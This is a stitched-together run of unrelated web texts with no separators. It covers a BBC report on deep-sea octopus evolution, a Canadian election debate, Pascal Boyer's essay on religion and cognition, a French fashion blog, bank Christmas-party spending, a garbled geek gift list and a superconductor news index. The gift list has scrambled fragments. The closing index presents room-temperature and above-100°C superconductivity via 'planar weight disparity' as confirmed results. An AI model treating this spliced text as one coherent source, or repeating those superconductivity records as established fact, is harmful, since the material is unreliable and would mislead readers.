The project , which began back in 2000 , involves more than 2,000 scientists from 82 nations .
The research into the evolution of deep - sea octopuses was part of a programme called the Census of Antarctic Marine Life ( CAML ) , explained Ron O'Dor , CoML 's co-senior scientist .
" Many of these octopuses were collected from the deep sea by a number of the CoML 's different projects , " he told BBC News .
Octopus specimens collected by Census of Marine Life researchers
Enlarge Image
" All of that material was brought together and made available to Dr Jan Strugnell , a biologist at Queen 's University Belfast , and she used this material to carry out DNA studies .
" She was looking at the relationship between these different deep - sea octopuses and how they originated .
" She has been able to trace the timeline for their distribution back 30 million years to a common ancestor . "
The species could all be traced back to a shallow - water octopus that lived in the Southern Ocean .
Today , the creature 's closest living relative ( Megaleledone setebos ) can still be found in the icy waters around Antarctica .
Dr O'Dor added that Dr Strugnell 's work also enabled her to identify how changes in the region 's ocean played a pivotal role in the development of the new species , especially the emergence of a " thermohaline expressway " .
" When you get an increase in sea ice , fresh water forms ice crystals and leaves behind high - salinity , high - oxygen water , which is denser than the surrounding sea water , so it sinks , " he explained .
We can use the first census as a benchmark to see what happens in the oceans over the next decade or more
Dr Ron O'Dor ,
CoML 's co-senior scientist
" It gets mixed by sea currents and flows into all of the deepest parts of the ocean .
" At the time this process started , there was no oxygen at the bottom of the ocean , so it brought oxygen into these areas , and we can now see that the octopuses moved out from the Antarctic into deeper water . "
Dr Strugnell 's work , supported by the UK's Antarctic Funding Initiative ( AFI ) and the National Environment Research Council ( Nerc ) , also showed how the creatures adapted to the new deep - sea environment .
One example was the loss of their ink sacs , because there was no need for the defence mechanism in the pitch black waters .
As well as being one of the CoML 's highlights , the research is also being published in the journal Cladistics on Tuesday .
' Unprecedented project '
The deep - sea octopus study , along with dozens of other projects , form part of the census 's fourth progress report , which will be presented at the World Conference on Marine Biology , which begins in Valencia , Spain , on Tuesday .
The overarching objectives of the global collaboration between CoML 's scientists include : Advancing technology for discoveries
Organising knowledge about marine life , and making it accessible
Measuring effects of human activities on ocean life
Providing the foundation for scientifically based policies Dr O'Dor said that the main focus of the CoML for the remaining two years was to " synthesise " the data .
" Many of our projects have already completed their fieldwork and we have a lot of information , " he observed .
CoML RESEARCH RESULTS
An array of receivers in the Pacific Ocean reveal fish migration routes
Tags unlock young salmon secrets Register clears out ' fishy ' names Tags reveal tuna migration routes Deep ocean trawl nets new ' bugs '
" What we are now trying to do is to bring all that information together in a form that allows the public to understand how much we have learned about the ocean and what lives in it . "
As far as improving our understanding of life beneath the waves , Dr O'Dor said : " It has been successful beyond what I imagined when I first became involved .
" It will provide a baseline .
We are not going to know everything about what is happening within the oceans , but we have samplings of most marine habitats .
" We are moving into this period of global warming , which is resulting in the acidification of the oceans , melting of the polar ice cap .
" We can use the first census as a benchmark to see what happens in the oceans over the next decade or more . "
Meeting formally for the first time at the five - day gathering in Valencia will be the CoML's Science Council , which will take an overview of the 10 - year Census .
" Over the past few years , there has been huge public interest in biodiversity because there is a legitimate concern about the changes being caused by humans , " commented Patricia Miloslavich , the Census 's co-senior scientist .
" The Science Council will ( consider ) what people have said about areas that have not been explored or taxonomic groups that have been overlooked in the past , " she told BBC News .
" We have had this first census that has given outstanding and amazing results for many ecosystems and regions .
" But now that we have been able to identify where there are some gaps , we would like to explore these areas . "
Dr Miloslavich added that the Science Council will also develop the objectives of the second census , which will run from 2010 until 2020 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Stephen Harper defended himself against attacks on his economic record Canadian political leaders have accused Prime Minister Stephen Harper of not having a plan to deal with effects of US financial crisis on the economy .
The five leaders were taking part in the second of two TV debates ahead of a general election on 14 October .
Opposition leaders said Mr Harper was keeping voters in the dark by failing to come up with an economic plan .
However , the Conservative leader played down fears , saying Canada was on a better economic footing than the US .
During the debate , Mr Harper also said for the first time that he had been wrong to support the US invasion of Iraq while leader of the opposition .
Polls have consistently given Mr Harper a 10 percentage point lead over his nearest rival , Stephane Dion of the Liberal Party .
What crisis ?
The longest part of the debate focused on the economy .
" We are not in the kind of economic crisis we have in the US , " Mr Harper said .
Where 's your platform ?
Yours is the only party that has n't put forward any platform in this election
Elizabeth May
Green Party " Overall , we 're being successful .
We 're keeping the economy on course and we 're not going into recession , " he said .
" What Canadians are worried about ... is they see the stock market problems , " he said .
However , the head of the leftist New Democratic Party ( NDP ) , Jack Layton , challenged Mr Harper 's position , saying : " The economy is not fine . "
" Either you do n't care or you 're incompetent , which is it ? " he asked .
Mr Dion shot back that Mr Harper had " no idea what to do " about the crisis .
Bloc Quebecois leader Gilles Duceppe likened Mr Harper 's approach to the economy to the laissez - faire policies of the Bush administration .
" It 's like ' do n't worry , be happy ' , " he said .
Elizabeth May , the first Green Party leader to participate in the leaders ' debate , called on Mr Harper to release an economic plan .
" You offered nothing up and again tonight you 've spent your time attacking the policies of others .
Where 's your platform ?
Yours is the only party that has n't put forward any platform in this election , " she said .
Green tax Mr Harper turned on Mr Dion , accusing him of panicking under pressure by unveiling an economic plan during the previous night 's debate in French .
During Wednesday 's debate , which also focused heavily on the economy , Mr Dion promised to consult financial regulators and provincial governments within 30 days of winning the election to develop measures to stimulate the economy .
It 's obviously clear the evaluation of weapons of mass destruction proved not to be correct
Stephen Harper
Prime Minister
For the first time in the campaign , Mr Layton turned on Mr Dion - in some parts of the country , the NDP has supplanted the Liberals as the most serious challenger to the Conservatives .
Mr Layton criticised Mr Dion for backing Mr Harper in confidence motions in parliament .
" If you can't do your job as leader of the opposition , I do n't know what you 're doing running for prime minister , " he said .
Mr Layton joined Mr Harper in attacking the Liberals ' Green Shift plan , which would pair income - tax cuts with a new tax on greenhouse gas emissions , saying it did not " add up " .
Plagiarism claim On Iraq , Mr Harper said the invasion " was absolutely an error " , reversing his past support for the US - led war .
" It 's obviously clear the evaluation of weapons of mass destruction proved not to be correct , " he said .
A senior staffer in the Conservative Party resigned on Tuesday after admitting he plagiarised parts of a speech by Australia 's then PM John Howard , urging support for the war .
Mr Harper 's Conservatives were elected in 2006 but without a majority .
His move to call a snap poll is seen as a bid to capitalise on favourable opinion polls and win an overall majority in parliament this time round , correspondents say .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Atheism will always be a harder sell than religion , Pascal Boyer explains , because a slew of cognitive traits predispose us to faith .
Is religion a product of our evolution ?
The very question makes many people , religious or otherwise , cringe , although for different reasons .
Some people of faith fear that an understanding of the processes underlying belief could undermine it .
Others worry that what is shown to be part of our evolutionary heritage will be interpreted as good , true , necessary or inevitable .
Still others , many scientists included , simply dismiss the whole issue , seeing religion as childish , dangerous nonsense .
Such responses make it difficult to establish why and how religious thought is so pervasive in human societies — an understanding that is especially relevant in the current climate of religious fundamentalism .
In asking whether religion is one of the many consequences of having the type of brains we come equipped with , we can shed light on what kinds of religion ' come naturally ' to human minds .
We can probe the shared assumptions that religions are built on , however disparate , and examine the connection between religion and ethnic conflict .
Lastly , we can hazard a guess at what the realistic prospects are for atheism .
In the past ten years , the evolutionary and cognitive study of religion has begun to mature .
It does not try to identify the gene or genes for religious thinking .
Nor does it simply dream up evolutionary scenarios that might have led to religion as we know it .
It does much better than that .
It puts forward new hypotheses and testable predictions .
It asks what in the human make - up renders religion possible and successful .
Religious thought and behaviour can be considered part of the natural human capacities , such as music , political systems , family relations or ethnic coalitions .
Findings from cognitive psychology , neuroscience , cultural anthropology and archaeology promise to change our view of religion .
Credit : G. BECKER
Based on assumption
One important finding is that people are only aware of some of their religious ideas .
True , they can describe their beliefs , such as that there is an omnipotent God who created the world , or that spirits are hiding in the forest .
But cognitive psychology shows that explicitly accessible beliefs of this sort are always accompanied by a host of tacit assumptions that are generally not available to conscious inspection .
For instance , experiments reveal that most people entertain highly anthropomorphic expectations about gods , whatever their explicit beliefs .
When they are told a story in which a god attends to several problems at once , they find the concept quite plausible , as gods are generally described as having unlimited cognitive powers .
Recalling the story a moment later , most people say that the god attended to one situation before turning his attention to the next .
People also implicitly expect their gods ' minds to work much like human minds , displaying the same processes of perception , memory , reasoning and motivation .
Such expectations are not conscious , and are often at odds with their explicit beliefs .
Research has shown that unlike conscious beliefs , which differ widely from one tradition to another , tacit assumptions are extremely similar in different cultures and religions .
These similarities may stem from the peculiarities of human memory .
Experiments suggest that people best remember stories that include a combination of counterintuitive physical feats ( in which characters go through walls or move instantaneously ) and plausibly human psychological features ( perceptions , thoughts , intentions ) .
Perhaps the cultural success of gods and spirits stems from this memory bias .
Humans also tend to entertain social relations with these and other non-physical agents , even from a very young age .
Unlike other social animals , humans are very good at establishing and maintaining relations with agents beyond their physical presence ; social hierarchies and coalitions , for instance , include temporarily absent members .
This goes even further .
From childhood , humans form enduring , stable and important social relationships with fictional characters , imaginary friends , deceased relatives , unseen heroes and fantasized mates .
Indeed , the extraordinary social skills of humans , compared with other primates , may be honed by constant practice with imagined or absent partners .
It is a small step from having this capacity to bond with non-physical agents to conceptualizing spirits , dead ancestors and gods , who are neither visible nor tangible , yet are socially involved .
This may explain why , in most cultures , at least some of the superhuman agents that people believe in have moral concerns .
Those agents are often described as having complete access only to morally relevant actions .
Experiments show that it is much more natural to think “ the gods know that I stole this money ” than “ the gods know that I had porridge for breakfast ” .
In addition , the neurophysiology of compulsive behaviour in humans and other animals is beginning to shed light on religious rituals .
These behaviours include stereotyped , highly repetitive actions that participants feel they must do , even though most have no clear , observable results , such as striking the chest three times while repeating a set formula .
Ritualized behaviour is also seen in patients with obsessive - compulsive disorders and in the routines of young children .
In these contexts , rituals are generally associated with thoughts about pollution and purification , danger and protection , the required use of particular colours or numbers or the need to construct a safe and ordered environment .
We now know that human brains have a set of security and precaution networks dedicated to preventing potential hazards such as predation or contamination .
These networks trigger specific behaviours such as washing and checking one 's environment .
When the systems go into overdrive they produce obsessive - compulsive pathology .
Religious statements about purity , pollution , the hidden danger of lurking devils , may also activate these networks and make ritual precautions ( cleansing , checking , delimiting a sacred space ) intuitively appealing .
Finally , studies of social and evolutionary psychology demonstrate a specifically human coalitional capacity , which has an impact on religion .
Humans are unique among animals in maintaining large , stable coalitions of unrelated individuals , strongly bonded by mutual trust .
Humans evolved the cognitive tools to achieve this .
They know how to gauge others ' reliability .
They can recall episodes of interaction and infer what people 's characters are like .
They can emit and detect costly , hard - to - fake signals of commitment .
This coalitional psychology is involved in the dynamics of public religious commitment .
When people proclaim their adherence to a particular faith , they subscribe to claims for which there is no evidence , and that would be taken as obviously wrong or ridiculous in other religious groups .
This signals a willingness to embrace the group 's particular norm for no other reason than that it is , precisely , the group 's norm .
Cognitive cache
So is religion an adaptation or a by - product of our evolution ?
Perhaps one day we will find compelling evidence that a capacity for religious thoughts , rather than ' religion ' in the modern form of socio-political institutions , contributed to fitness in ancestral times .
For the time being , the data support a more modest conclusion : religious thoughts seem to be an emergent property of our standard cognitive capacities .
“ The mind has myriad distinct belief networks that contribute to making religious claims quite natural to many people . ”
Religious concepts and activities hijack our cognitive resources , as do music , visual art , cuisine , politics , economic institutions and fashion .
This hijacking occurs simply because religion provides some form of what psychologists would call super stimuli .
Just as visual art is more symmetrical and its colours more saturated than what is generally found in nature , religious agents are highly simplified versions of absent human agents , and religious rituals are highly stylized versions of precautionary procedures .
Hijacking also occurs because religions facilitate the expression of certain behaviours .
This is the case for commitment to a group , which is made all the more credible when it is phrased as the acceptance of bizarre or non-obvious beliefs .
We should not try to pinpoint the unique origin of religious belief , because there is no unique domain for religion in human minds .
Different cognitive systems handle representations of supernatural agents , of ritualized behaviours , of group commitment and so on , just as colour and shape are handled by different parts of the visual system .
In other words , what makes a god - concept convincing is not what makes a ritual intuitively compelling or what makes a moral norm self - evident .
Most modern , organized religions present themselves as a package that integrates all these disparate elements ( ritual , morality , metaphysics , social identity ) into one consistent doctrine and practice .
But this is pure advertising .
These domains remain separated in human cognition .
The evidence shows that the mind has no single belief network , but myriad distinct networks that contribute to making religious claims quite natural to many people .
The findings emerging from this cognitive - evolutionary approach challenge two central tenets of most established religions .
First , the notion that their particular creed differs from all other ( supposedly misguided ) faiths ; second , that it is only because of extraordinary events or the actual presence of supernatural agents that religious ideas have taken shape .
On the contrary , we now know that all versions of religion are based on very similar tacit assumptions , and that all it takes to imagine supernatural agents are normal human minds processing information in the most natural way .
Knowing , even accepting these conclusions is unlikely to undermine religious commitment .
Some form of religious thinking seems to be the path of least resistance for our cognitive systems .
By contrast , disbelief is generally the result of deliberate , effortful work against our natural cognitive dispositions — hardly the easiest ideology to propagate .
FURTHER READING
Boyer , P. Religion Explained : Evolutionary Origins of Religious Thought ( Basic Books , 2001 ) .
Boyer , P. & Lienard , P. Behav . Brain Sci. 29 , 1–56 ( 2006 ) .
Wilson , E. O. Consilience : The Unity of Knowledge ( Little Brown & Co. , 1998 ) .
Author information Affiliations Pascal Boyer is in the Departments of Psychology and Anthropology , Washington University in St Louis , Missouri , USA , and is the author of Religion Explained .
pboyer@wustl.edu Pascal Boyer Authors Pascal Boyer View author publications
You can also search for this author in PubMed Google Scholar
Rights and permissions Reprints and Permissions
French fashion culture are well known all over the world especially on the world of fashion .
From time to time , fashion industry is becoming a recognized force in the sponsorship of French culture , which recently in the domain of world fashion .
French fashion culture are became dominant since the seventeenth century .
It starts when the headquarters for fashion houses have been traditionally situated in the quarter around the Rue du Faubourg Saint - Honoré .
Until the year 1980's , the Montaigne avenue is on the extent which overtaken the Rue du Faubourg Saint - Honoré .
The fashion industry was turn into high fashion accompanied with the accessories .
The France fashion and style dates largely to the reign of Louis XIV .
Through the reign of Louis XIV , the luxury goods industries in France came increasingly under royal control .
The French royal court became the arbiter of taste and style in Europe .
This is the beginning and rise in prominence of French fashion .
It was linked also into the creation of the fashion press in the early 1670s .
This is the period of transformation of the fashion industry by marketing designs to a broad public outside the French court .
And this is the starts of popularizing the French culture fashion through introducing fashion seasons like fall - winter , autumn , etc .
Through the fashion seasons , more designer clothes are equipped in changing styles of fashion but still in the depicts French fashions .
The emerging of public - private partnership has brought cultural spending an attractive investment for corporations that deals on luxury products in fashion lines .
French mega - firms in fashion industry have emerged in a decade of booming growth and takeovers .
Through the takeovers of the French designers and fashion corporations , the French fashion is in continue spreading its designs and styles all over the world .
The highest profile of French fashion was indicate the commitment of Louis Vuitton company or LVMH .
LVMH is the world 's largest luxury good purveyor that maintains the dominance of French fashion in the world of fashion .
In the world of fashion , not only LVMH had the power of contributing luxury fashion goods in fashion trends .
There are lot of well - known and respective French designers that work on their own version and styles .
They have their own identity of fashion styles and depict it in their designer clothes products .
Some of there are Charles Frederick Worth , Coco Chanel , Lucien Lelong , Elsa Schiaparelli , Cristóbal Balenciaga , Christian Dior , and Yves Saint Laurent .
These are the prominent personalities behind the distribution and contribution of French fashion all over the world .
Paris has the great contribution also because it serves as the Fashion headquarters of those respectable designers .
Because of that , Paris is known as the fashion capital in the world .
Through the contributions of French fashion culture in the line of designer clothes , some of the foreign designer clothes are enriching the French fashion trends by means of introducing new style and designs which blends on the foreign fashion and French fashion .
Through blending of those styles and designs , a new fashion trends are made and it was ready to adopt by all fashionistas all over the world including the French speaking countries .
Lloyds TSB has put aside £ 35 a head for their employees
The decision by Lloyds TSB , which accepted a £ 5.5 billion handout just a few weeks ago , has sparked outrage .
The bank is refusing to scale down its festive celebrations even though it was one of the beneficiaries of Gordon Brown ’s £ 37 billion rescue package designed to save the British banking system from collapse .
Lloyds TSB defended its decision by claiming its 67,000 staff deserved a festive reward after working hard through the year , and it described the outlay as “ modest ” .
It also emerged that Royal Bank of Scotland is to spend £ 1 million on Christmas parties for its staff , despite receiving a £ 20 billion bailout .
The Edinburgh - based bank has allocated £ 10 of taxpayers ’ money to every one of its 100,000 UK employees for this year ’s celebrations .
We are very proud of our staff who work extremely hard and we want to reward them .
Lloyds TSB spokeswoman
Liberal Democrat spokesman Vince Cable said : “ The banks simply do n’t get it .
Large numbers of people in the financial sector are now losing their jobs .
“ The banks are dependent on taxpayers ’ money but they appear to want to continue to live the lifestyle of the glory days when any sense of financial responsibility was disregarded . ”
Mark Wallace , campaign director for the TaxPayers ’
Alliance , said : “ We would n’t want to eliminate Christmas but for an awful lot of taxpayers who have bailed out the banks this Christmas is going to be a very difficult time indeed .
" I think some restraint is in order and they should n’t behave as they did before they took the money .
The banks have got to remember that part of their money has come from taxpayers and not from profits earned by their abilities . ”
A spokeswoman for Lloyds TSB said the bank had decided to fully fund staff parties up to a limit of £ 35 a head .
All 67,000 staff would be entitled to take part , adding up to a total of £ 2,345,000 .
Departmental heads would have the responsibility of organising events for branches across the country .
She said : “ We are very proud of our staff who work extremely hard and we want to reward them .
We have agreed on a modest budget of £ 35 a head which will apply across the board whatever position staff hold in the bank .
“ Accepting the Government offer does not reflect on our performance or mean that the bank is necessarily in bad shape . ”
When the Prime Minister made the decision to invest billions of taxpayers ’ money to prop up some of Britain ’s major banks , he promised to end the culture of “ rewards for failure ” .
He also pledged that directors at the banks taking part in the bailout would not receive cash bonuses this year .
More than three - quarters of private sector companies will fund a staff Christmas party this year , according to the Chartered Institute of Personnel and Development .
The figure is just seven per cent down on last year , des­pite the impact of the credit crunch .
Charles Cotton , CIPD ’s expert on staff rewards , said : “ As ever , employers need to think about why they are providing a Christmas party in the first place .
If it is to recognise the collective contribution of their employees then what are the alternatives and are they more effective ?
“ If holding a Christmas party is the most effective way of achieving this then employers should be wary about scrapping them in response to the ­economic downturn because the long - term impact could be damaging on employee engagement and organisational performance .
“ The Christmas party is one way of reminding staff that they are part of a common endeavour . ”
10 .
To kick off the list , let 's dive straight into the staple - drink of all geeks : Bawls G33K B33R ( or just regular bawls ) .
Buy Bawls Here
9 . Here 's something awesome for the A/V Geek : Mvix Wireless HD Media Center
You gotta supply your own hard drive to run this puppy
8. The Geek Photographer
Something for the shirt - geeks ( ironic t- shirts , fanboy shirts , etc. )
6. Japanese Fanboy Geek : USB Computer Mega Awesome Owl Robot Spectacular !!!!
5 . The Chemistry Geek ( or a TF2 Fanboy )
- Lab Coat and Awesome Goggles
AllHeart
SafetyGlassesUSA
BONUS CHEMISTRY KIT
4. The Gaming Geek 's Essential Video Game Collection
Kotaku
3. The Coffeeloving Geek / Dad/ Office Zombie - Black &Decker Cup At A Time Coffee Maker
.
Get it at any Wal - Mart , Ross , Target , Radioshack ... or online at the [
Happy Holidays to all of you Geek supporters !
Get it at any Wal - Mart , Ross , Target , Radioshack ... or online at the [ iTunes store
With the holiday season rapidly approaching , we 're often caught browsing internet stores and reading top ten lists of gifts perfect for ... whoever .
Well , here 's another list to pre-occupy you while at work .
These gifts are for the Geeky , and it seems so tempting to buy them just to put a smile on that certain geek 's face .
G33 k b33r has all the right ingredients to keep that geek of yours smashing away at his / her keyboard , while in an intense round of TF2 , or pounding out some ruby - on - rails .
Bawls main ingredient is Guarana , from the amazon .
The stuff is said to taste like a fruity sprite , and the Root Beer actually tastes like root beer with a nice ... fruity flavor ?
[ The Mvix player and case looks like a pretty advanced router , but even cooler . , however ( simply connect any size 3.5 " SATA or IDE hard drive ) .
It also connects you to your network via ethernet / 802.11 / g.
It 's also a media player that can connect to your HDTV via component / composite / s - video / dvi .
Amazed yet ?
Supported file formats include MP1/2/4 , DivX , Xvid , VOB .
Musically , it can take MP3s , ogg , wav and AC3 .
Phew .
Streaming support from other computers is available as well .
Now if your geek is looking for more out of a wireless media player , we 've got great news for you .
It can display your photos , and syncs up your music and creates a nifty little slideshow of your photos .
It 's worth the geeky investment , since it 'll be replacing the dvd's on the shelves , so more room for pictures of your cat / dog / cable nests .
The Mvix Player runs for about $ 289.99 on sale [ Buy from NewEgg How about a nifty little tripod ?
The Gorillapod offers some nifty design for a tripod .
It firmly secures a digi camera to pretty much any surface !
Breaking the mold of the traditional tripod , this one does not require an elevated flat surface .
Twist it to a fencepost .
Stick it to the hood of your car ( not in motion , obviously ) .
It 's lightweight , compact , and it can wrap to stuff .
Easily carried , might I add .
Perfect for that photo geek - on - the - go .
Get it from [ Joby ] models ranging from $ 39.95 -$ 149.957 .
A truly unique shirt - it plays music .
What more can I say ?
7 different drum noises .
Loads of smacking yourself on the chest while walking down the street .
Who knows ?
Get it for $ 29.99 at [ ThinkGeek
We all know one .
Drawers full of Manga / Anime .
A guilty pleasure for some , a secret lust for others ( no offense bro , it was the dragon - button - up shirt that gave it away ) .
We love our Japan - obsessed buddies , so why not give em what they like ?
This robo - owl ( as seen in the Tootsie Pop commercials ) is perfect for the geeks , and the girlfriends that like cute stuff .
It blinks its eyes , and swivels its head .
So damn cute you might as well buy two .
Get it at [ ThinkGeek ] for $ 19.99
Look at those freakin ' goggles .
Who would n't want them ?
( Actual welding goggles ) . and the Labcoat - what a deal $ 26 at [ Goggles - $ 10.20 at [ Get it for $ 39.95 at [ HomeTrainingTools
Let me just refer you to this post @ It covers all consoles / pcs / handhelds , the best games for each
The DCM7 coffee maker brews 1 cup at a time .
Because lord knows if you fill that pot , you 're gonna drink it all .
And that is n't good .
This coffeemaker brews one fresh , piping hot cup of coffee on demand .
Great for rolling out of bed and slamming one immediately .
Less wait time then a regular pot of coffee / espresso , with way less effortGet this thing at [ DealTime ] for as low as $ 12.992 .
The Movie Buff / Geek ( because geeks usually are n't too buff , ahem ) I 'd suggest something worthy of a geek that spends time on his computer watching movies .
Give him a hand with legally renting movies online !
Netflix Gift Card !!!
Get on from [ Netflix ] @ any price you choose1 .
Music Loving , iPhone / iPod having geek !
I STRONGLY recommend buying a couple iTunes gift cards for those buddies of yours that dig music in a legal fashion .
It 's a great excuse to support some preferred artists and musicians , as well as iPhone / iPod apps and games to play .
Get them the gift that they have full control of what they get .
Superconductor News
Between 1986 and 1994 most advances in the field of superconductivity related to the discovery of new superconductor " systems " and compounds .
In recent years , except for the discovery of several atypical superconductors , superconductor news has been mainly about novel ways to employ the new generation of ceramic superconductors , innovative fabricating techniques and new PWD ( planar weight disparity ) superconductors .
Those stories with a flashing arrow are currently the most popular with readers .
2020 :
Edge Supercurrent : A Different Sort of Superconductivity - 6/11/20
Exiton Condensate : A Theoretical Analog to a Superconductor - 2/21/20
Evidence for Spin Fluctuations Contributing to HTSC - 2/03/20
2019 :
Scientists Discover Elastic Superconductor - 10/23/19
Topological Superconductor Makes Possible Quantum Computing - 08/17/19
Record Strong Mini-Magnet Created Using Superconductive Tape - 06/13/19
Using AI to Evolve Improved Superconductors - 05/24/19
US Navy Files Patent for Room Temperature Superconductor - 02/22/19
Lanthanum - Hydride Edges Toward Room Temperature - 01/15/19
2018 :
A New Type of Superconductor Discovered - 04/09/18
Probing Superconductivity with " Magic - Angle " Graphene - 03/07/18
Superconductivity up to 251K in Actinium Hydride Under High Pressure - 02/18
Positive Feedback Reinforces Superconductivity in the Cuprates - 1/18/18
2017 :
Computer Simulation Predicts Stripes in HTS Cuprates - 12/01/17
Warm Superconductivity Gives Way to Hot Superconductivity - 9/07/17
A New Phenomenon in the Physical Sciences - 7/19/17 with UPDATE
10/11/18
Reformulated Superconductors Yield New Thermoelectric Oxides - 7/10/17
SLAC Scientists Confirm Strong Electron - Phonon Link to Superconductivity - 07/06/17
Ultimate Validation of Planar Weight Disparity : RT Superconductivity Using Zinc - 4/23/17
Theoretical Superconductivity Size Limit Confirmed - 03/20/17
Mystery Superconductor Comes to Earth Embedded in a Meteorite - 02/17
Metallic Hydrogen Finally Created - 1/26/17
Milestone Superconductivity Above 200 Celsius - 1/02/17
2016 :
Vanadium - Dioxide Proves Best Anion Above 100 °C - 12/16/16
Supercold Bismuth Puts BCS
Theory in Jeopardy - 12/02/16
The Most Synergistic Room - Temperature Superconductor - 11/21/16
A Recipe for Making Superconductive Oxides - 11/01/16
Room - Temperature Superconductivity From Only 9 Atoms - 10/18/16
Reformulating MgB2 as an Oxide Doubles Tc - 10/08/16
Truncated YBCO Produces High -VF Superconductivity Using Trivalent Non-Rare Earths - 10/01/16
The First Scandium High - Temperature Superconductor | with Reentrant Behavior - 09/18/16
YBCO Without Copper is Still Superconductive !
-
08/24/16
HTS Theory Gets A Boost from Rare Earth Metals -
08/11/16
UPDATED WITH MAGNETIZATION DATA :
Blistering Hot Superconductivity at 167C , 178C and 187C - 07/26/16
Surprising Zinc Superconductor Lends Support to +2,+1 Theory - 07/18/16
A Room - Temperature Superconductor With Just 3 Elements - 06/29/16
+ 2,+1 Metals and Oxygen Equals HTSC | Theory Takes Shape - 06/19/16
Room Temperature Superconductivity without Copper - 06/07/16
The First Ternary High Temperature Superconductor - 05/28/16
A New HTSC Analog to the Copper Oxides - 05/13/16
Reformulating BSCCO and TBCCO for Higher Tc - 04/04/16
2 - D Boron Found To Be A Superconductor | No Pressure Required - 03/31/16
A New Infinite Layer Superconductor System | with Tc's Above 180 Kelvin - 03/08/16
Shaming the Scientific Community with Record Superconductivity - 02/20/16
Laser Light Improves Buckyball Superconductivity - 02/09/16
Advancing High Tc for Copper - Chain Superconductors via Cadmium Pyroniobate - 02/01/16
2015 :
A Room - Temperature Superconductor Without BaCuO Endcaps - 12/12/15
YBCO Reformulated for Room - Temperature Superconductivity - 11/10/15
ORNL Confirms HTSC Arises From Oxygen Ions -
09/30/15
Room - Temperature Superconductors 28 , 29 and 30 | Via 5 b Metals - 08/27/15
Superconductor Facilitates Artificial Magnetic Wormhole - 08/21/15
Achieving Room - Temperature Superconductivity Using Only 4 Elements - 07/05/15
Superconductivity Near 203K in Compressed Hydrogen Sulfide - 06/26/15
Superconductivity Above 140C | Temperatures
Hot Enough to Melt Solder - 05/16/15
A New State of Superconductive Matter - 05/12/15
Mott Transitions Confirm 120C Superconductor - 03/20/15
The First 400 Kelvin Superconductor | Over 100 Degrees Above RT - 03/09/15
Planar Weight Disparity After Ten Years : High Tc Reaches 119 Celsius - 02/01/15
MIT Researchers Discover Universal Law of Superconductivity - 01/11/15
2014 :
Possible Superconductivity Near 190K in Compressed H2S - 12/10/14
Inverse Proximity Effect via High Dielectric Constant - FeSe Goes Above 100K - 11/24/14
Milestone Superconductivity Above 100 Celsius - One for the Record Books - 11/05/14
Computational Model Predicts Superconductivity - 11/3/14
Superconductivity Goes Above 95C - Throwing Down the Gauntlet - 10/12/14
Mother of Higgs Boson Found in Superconductors - 09/05/14
3 New Variants of TeBCO | and an Improved Synthesis Method - 08/28/14
Tracking Quantum Particles Using Superconductors - 08/06/14
Resistance Tests Confirm Hardened 77C Superconductor - 06/14/14
Supplemental Resistance Tests Confirm 65C Superconductor - 05/03/14
Ultra-Fast Laser Reveals Charge Stripes ' Role in HTSC - 04/16/14
More Support for Room Temperature Superconductivity in Background Noise - 03/31/14
77C : Colossal Dielectric Constant Produces Colossal Tc - 02/14/14
65C Superconductivity Achieved By Increasing Dielectric Constant - 01/29/14
2013 :
Partial Confirmation of Room - Temperature Superconductivity at O.R.N.L. - 12/26/13
A Freezer Temperature Superconductor that uses Tantalum - 12/24/13
53C Superconductivity : An Upper Limit for the Copper Oxides ? - 11/28/13
A New Low - Temperature Nitride Superconductor - 11/4/13
Pushing PWD to Make a 48C Superconductor - 10/29/13
The First Computer - Designed Superconductor - 10/08/13
Record Superconductivity Hits 42 Celsius | Tweaking the Elasticity Modulus - 09/10/13
High Tc Superconductivity Record Reaches 38C - 07/29/13
A Theory That Explains Planar Weight Disparity - 05/26/13
TeBCO : A New Copper Chain Superconductor Family - 04/16/13
Electrons Alone Can't Explain Cu Superconductivity - 03/19/13
Silicon Substitution Advances High Tc Above 35C - 01/31/13
2012 :
High Tc Goes Above 30C - 12/29/12
A New 104K YBCO Variant with Unusual Transition Curve - 11/07/12
RTSC in Graphite Interface ? - 09/12/12
Commercializing the First Room - Temperature Superconductor : A Bleak Outlook - 05/05/12
Magnetic Josephson Effect Observed - 04/19/12
Electronic vs. Phononic Contributions to Cooper - Pairing - 03/29/12
2011 :
Room - Temperature Superconductivity in a Copper - Oxide - 12/06/11
Planar Weight Disparity : Essential to HT Superconductivity ?
- 10/15/11
American Superconductor Destroyed for a Bribe - 09/21/11
Evidence for the First Topological Superconductor - 08/04/11
Electron Clouds Mediate Superconductivity in the Pnictides . - 06/17/11
Unethical Behavior in the Superconductor Community - 06/13/11
And Elsevier Publishing Refuses to Print a Correction
Pseudogap - A New State of Matter ? - 03/24/11
Superconductivity Observed Near 20 Celsius - 03/17/11
Superconductivity Found in Neutron Stars - 02/24/11
New Support for Phonon Mediation in High Temperature Superconductors - 01/31/11
Laser Light Triggers Superconductivity - 01/14/11
2010 :
Milestone Superconductivity Above 0 Celsius - 12/26/10
A New High Tc for Calcium - Doped YBCO : 107K - 11/20/10
Strange Magnetism Appears with Heavy Doping - 11/17/10
World Record Superconductivity Approaches 265 Kelvin - 10/24/10
A Short - Lived Superconductivity Record of 258K - 10/14/10
Fractals Boost Superconductivity - 08/13/10
A YBCO Mystery : No Increase in Magnetic Tc - 07/24/10
Possible RTS in a Metal - PZT Interface - 07/20/10
Oxygen Site Disorder Found in the Pseudogap Phase - 07/14/10
A Superhard Superconductor | BC5 Structure with Boron - 06/24/10
Calcium Doping YBCO to Increase Tc | 99 K and 96 K with Higher Jc - 04/14/10
Y358 Discovery by Superconductors .ORG
Leads to 7 New YBCO Variants - 03/31/10
The World 's Smallest Superconductor Discovered - 03/29/10
A Superconductor Without Fixed Tc - 03/16/10
Superconductors Could Simulate the Brain - 03/05/10
A Surprising New Hydrocarbon Superconductor - 03/03/10
Entanglement Supports Very High Tc Superconductivity - 02/11/10
Physicists Discover How to Entangle at High Temperatures
2009 :
A Step Toward Tunable Superconductors - 10/29/09
Superconductor World Record Surpasses 250K - 10/10/09
Superconductivity Record Tops 240K - 05/18/09
Europium Becomes Superconductive Under Pressure - 05/15/09
High - Tc Jumps 15 Degrees to 233K - 03/24/09
Coaxing YBCO Above 175K - 03/03/09
The First " Type 1.5 " Superconductor Discovered - 02/17/09
218K Superconductor Signature Resolved - 01/29/09
2008 :
200K Superconductor Tweaked to 212K - 11/30/08
